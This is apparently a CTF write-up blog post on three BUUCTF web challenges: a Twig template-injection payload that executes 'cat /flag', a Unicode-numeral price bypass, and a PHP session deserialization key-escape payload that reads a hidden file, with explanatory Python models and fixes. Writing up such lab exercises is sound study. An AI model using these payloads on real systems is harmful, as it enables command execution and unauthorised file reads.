
Buuctf web (VII)

2022-06-13 08:21:00 1ZAYAK1

[BJDCTF2020]Cookie is so stable

The hint is inside.
Capture the request and take a look.
My guess was SSTI, but after trying a few commands it wouldn't work, so I looked at other people's writeups.

payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

Reference: https://blog.csdn.net/weixin_44477223/article/details/115673318

[ASIS 2019]Unicorn shop

Buy unicorns.

I tried buying one several times but failed.

But when I enter 10 as the amount, only one character is allowed. And utf-8 is very important...

So I have to buy that expensive unicorn with a single character.

https://www.compart.com/en/unicode/html

The bigger the better. Searching for "thousand" turns up a pile of them.

This one is big enough: one hundred thousand.

Change the 0x to a percent sign: %E2%86%88

Done.
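The root cause, as an added Python example (not the challenge's source, which is not on the page): %E2%86%88 is the UTF-8 encoding of U+2188 ROMAN NUMERAL ONE HUNDRED THOUSAND, and Python's unicodedata.numeric() reports 100000 for it. lenient_price() is my assumption of what the shop's single-character check does, strict_price() is the hardened parser, and UNICORN_PRICE is a constructed figure.

```python
import unicodedata
from decimal import Decimal, InvalidOperation

UNICORN_PRICE = Decimal("1337")  # constructed price, not the challenge's


def lenient_price(text: str) -> float:
    """Assumed model of the shop's check: a single character is accepted if
    Unicode assigns it any numeric value. That includes letter-like numerals
    such as U+2188, which float() rejects but numeric() values at 100000."""
    if len(text) != 1:
        raise ValueError("only one character is allowed")
    try:
        return unicodedata.numeric(text)
    except ValueError:
        raise ValueError("not a numeric character") from None


def strict_price(text: str) -> Decimal:
    """Hardened parser: ASCII digits with at most one '.', then Decimal.
    The isascii() test matters: float(), int() and Decimal() all accept
    non-ASCII decimal digits (category Nd), so a digit check alone is not
    enough."""
    if not text or len(text) > 12 or not text.isascii():
        raise ValueError("price must be a short ASCII string")
    if text.count(".") > 1 or not all(c in "0123456789." for c in text):
        raise ValueError("price must be a plain decimal number")
    try:
        return Decimal(text)
    except InvalidOperation as exc:  # e.g. a lone "."
        raise ValueError("price must be a plain decimal number") from exc


def purchase_allowed(paid_text: str, parser) -> bool:
    """True if the parsed amount covers the unicorn; a parse error is a refusal."""
    try:
        return Decimal(parser(paid_text)) >= UNICORN_PRICE
    except ValueError:
        return False


if __name__ == "__main__":
    # U+2188 (the writeup's character) and U+0663 ARABIC-INDIC DIGIT THREE
    for amount in ("10", "1337", "\u2188", "\u0663"):
        print(repr(amount),
              "lenient:", purchase_allowed(amount, lenient_price),
              "strict:", purchase_allowed(amount, strict_price))
```

The lesson for a price field is that "is this a number" must be asked of the ASCII representation you actually intend to accept, not of whatever Unicode numeric property a character happens to carry.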

[An Xun Cup 2019]easy_serialize_php

Source code

<?php

$function = @$_GET['f'];

function filter($img){
    
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

phpinfo contains a hint pointing at d0g3_f1ag.php.

That means we have to read that file through file_get_contents, i.e. make base64_decode($userinfo['img']) equal d0g3_f1ag.php, i.e. make $userinfo['img'] equal ZDBnM19mMWFnLnBocA==. $userinfo is the deserialized $serialize_info, $serialize_info is serialize($_SESSION) passed through filter(), and $_SESSION['img'] has already been set by

if(!$_GET['img_path']){
    
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

at initialization: once img_path is passed directly, it gets sha1'd.

We notice that extract($_POST) gives us variable overwriting, but assigning img directly doesn't work either, because the overwrite happens first and then the code above runs again.

Let's sort this out. Right now _SESSION has three elements:

$_SESSION["user"] = 'guest';
$_SESSION['function'] = @$_GET['f'];
extract($_POST); // after this line only two elements are left: the two above get overwritten. One of the remaining two is the one we control via POST, the other is img below
$_SESSION['img'] // never mind what it is

After that they are serialized together, and after deserialization img is just what it should be (guest_img.png), which can't read the file we want.

But! Both of them are filtered after being serialized: the filtered characters are replaced with nothing, and PHP serialization has a feature.

For example, a serialized string looks like

s:x:"variable name";s:x:"variable value";...

If the variable value is shorter than x, the parser keeps reading forward until it has consumed x characters. We can use this to swap in the value of img (the original img is still there; it just isn't read any more, since the value that came before is enough).

For example, if we POST one extra value, after serialization it becomes

a:2:{s:x:" The variable name you passed ";s:x:" The variable value you passed ";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

The initial idea: either the variable name gets shorter, or the variable value gets shorter (replaced with empty). If the value gets shorter, the parser simply keeps consuming the following ";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}, and then there is no way to give img the value we want. So the only option is to lose the variable name, so that the name swallows part of the variable value, and the rest of the variable value can then assign img; after the assignment the brace closes, and whatever img comes after that is ignored.

What do we want img to be? We want to put that value in the second half of the variable value we pass. As said before, we want img to be ZDBnM19mMWFnLnBocA==, so the second half should look like this (the closing } is what separates off the useless img that follows):

s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

For example, let's pass flag=s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

a:2:{s:4:"flag";s:39:"s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}\";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

After filter() it becomes

a:2:{s:4:"";s:39:"s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}\";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

The variable name we passed, flag, is gone, so the parser still has to read 4 characters after the quote, namely ";s:, which is far from reaching img. What we finally want is for

s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==

to be treated as an independent variable, and the part before it should also be a complete variable after filtering (including variable name and variable value, and don't forget to separate them with semicolons).

The initial payload is as follows; x we can modify freely, and aa stands for two digits (the "; in front of s:3:"img";s:20:"ZDBnM19mMWFnLnBocA== is added directly at the start of the parameter value when it is passed)

a:2:{s:x:"";s:aa:"xxx...xx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}\";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

We just need

s:x:"";s:aa:"xxx...xx"

to become something like

s:x:"name";s:x:"value"

so the first variable's name can be ";s:aa:

In that case the first x is 7 (this x is determined by the length of the parameter name we pass, so we pass phpflag, which is exactly 7)

s:7:"";s:aa:"    xxx...xx"

So we just need xxx...xx to become

;s:1:"1

Summing up, after splicing it becomes (after filtering; I added spaces for the first variable)

a:2:{s:7:"  ";s:aa:   ";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}\";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

Before filtering it should be

a:2:{s:7:"phpflag";s:aa:   ";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}\";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

So the payload is (GET: ?f=show_image)

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

(No... I'm really convinced. I was stuck for another half day thinking I had made a mistake, only to find my payload was the same as other people's. I wondered whether it was the same as the last question, Content-Type: application/x-www-form-urlencoded, and adding it did it... Ahhhhhh, what is this)

Base64-encode /d0g3_fllllllag to get L2QwZzNfZmxsbGxsbGFn and just swap it in for the original; the length happens to be the same.

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
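The length-prefix behaviour the whole walkthrough turns on, modelled in Python as an added example (not code from the challenge or from this writeup): a serializer and a minimal unserializer for PHP's a:N:{s:L:"k";s:L:"v";...} shape, the challenge's filter applied after serialization the way index.php does it, and the same filter applied before serialization as the fix. The session contents are constructed from the payload above; the img value Z3Vlc3RfaW1nLnBuZw== is assumed to be the base64 of guest_img.png, and the model treats strings as ASCII so that Python's len() matches PHP's byte length.

```python
import re

# Block list and pattern copied from the challenge's filter().
BLOCKLIST = ('php', 'flag', 'php5', 'php4', 'fl1g')
FILTER = re.compile('|'.join(map(re.escape, BLOCKLIST)), re.IGNORECASE)


def php_serialize(arr: dict) -> str:
    """PHP serialize() for a flat array of string keys and string values.
    Every string is written as s:<length>:"<bytes>"; nothing is escaped."""
    body = ''.join(f's:{len(k)}:"{k}";s:{len(v)}:"{v}";' for k, v in arr.items())
    return f'a:{len(arr)}:{{{body}}}'


def php_unserialize(data: str) -> dict:
    """Minimal PHP unserialize() for the same shape. Like PHP it trusts the
    s:L: prefix and reads exactly L characters whatever they are, and it
    ignores any bytes after the closing brace."""
    pos = 0

    def expect(token: str) -> None:
        nonlocal pos
        if not data.startswith(token, pos):
            raise ValueError(f'expected {token!r} at offset {pos}')
        pos += len(token)

    def read_int() -> int:
        nonlocal pos
        end = data.index(':', pos)
        value = int(data[pos:end])
        pos = end + 1
        return value

    def read_string() -> str:
        nonlocal pos
        expect('s:')
        length = read_int()
        expect('"')
        text = data[pos:pos + length]
        if len(text) != length:
            raise ValueError('string shorter than its length prefix')
        pos += length
        expect('";')          # the closing quote must land exactly here
        return text

    expect('a:')
    count = read_int()
    expect('{')
    result = {}
    for _ in range(count):
        key = read_string()
        result[key] = read_string()
    expect('}')
    return result


def vulnerable_show_image(session: dict) -> dict:
    """The challenge's order: serialize, then filter, then unserialize."""
    return php_unserialize(FILTER.sub('', php_serialize(session)))


def hardened_show_image(session: dict) -> dict:
    """Sanitize each key and value before serializing, so every length
    prefix describes the characters that actually follow it."""
    cleaned = {FILTER.sub('', k): FILTER.sub('', v) for k, v in session.items()}
    return php_unserialize(php_serialize(cleaned))


# Constructed $_SESSION as index.php builds it for the payload above.
SESSION = {
    'phpflag': ';s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}',
    'img': 'Z3Vlc3RfaW1nLnBuZw==',   # assumed base64 of guest_img.png
}

if __name__ == '__main__':
    print('filtered after serialize :', vulnerable_show_image(SESSION))
    print('filtered before serialize:', hardened_show_image(SESSION))
```

Removing phpflag leaves s:7: describing seven characters that are now the quote, the separator and the next length prefix, so the parser lands inside the POSTed value and takes the img it finds there. Sanitizing before serialization keeps every prefix truthful; the stronger fix is not to unserialize user-influenced data at all and simply use $_SESSION directly.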

I'm impressed...
Oh, I saw other people's writeups: it can also be constructed from the value side, just pass two parameters.


Copyright notice
This article was written by [1ZAYAK1]; please include a link to the original when reposting, thanks.
https://yzsam.com/2022/02/202202270543540529.html